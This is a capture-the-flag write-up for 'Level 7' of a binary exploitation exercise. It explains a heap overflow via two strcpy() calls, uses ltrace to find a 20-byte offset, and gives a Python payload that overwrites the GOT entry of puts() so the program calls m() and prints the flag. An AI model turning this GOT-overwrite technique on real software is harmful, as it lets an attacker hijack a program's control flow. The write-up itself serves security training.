# Level 7

## Observations

1. The programs segfaults when given 0 or 1 arguments ; when given 2 or more, it prints `"~~"`
2. The program uses `strcpy()` to write the inputs into `malloc()`-ed buffers.
3. The flag is opened and copied in a global buffer called `c`.
4. There is an uncalled function `m()` that displays the content of `c`.
5. The program always end by calling `puts("~~")`

## Plan

There are 2 calls to `strcpy()` that copy the two inputs into two separate buffers.  
We will use the first call to `strcpy()` to create a *Heap Buffer Overflow* and overwrite the arguments of the second `strcpy()`.  
We want the second `strcpy()` to copy the address of `m()` in the *GOT* to replace to address of `puts()` so that calling `puts()` will instead call `m()`.

First we need to estimate how many bytes we need to write in the first buffer to start overwriting the second buffer.  
We can do that using `ltrace` and some *Buffer Overflow Pattern* to have a look at the functions arguments.

```bash
ltrace ./level7 "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab[...]"
[...]
strcpy(0x0804a018, "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab"...) = 0x0804a018
strcpy(0x37614136, NULL <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
```

- Using the second `strcpy()`'s first argument, we determine that we start overwriting the second buffer after **20 bytes**.  
- Using `nm` we determine that the address of `m()` is **0x080484f4**.  
- Using GDB we determine that the GOT address of `puts()` is **0x8049928**.

We will set the second `strcpy()`'s first argument to the GOT address of `puts()` by doing a *Buffer Overflow* and set its second argument to the address of `m()` simply by giving it as `argv[2]`.

## Payload

```bash
./level7 $(python -c 'print "A" * 20 + "\x08\x04\x99\x28"[::-1]') $(python -c 'print "\x08\x04\x84\xf4"[::-1]')
```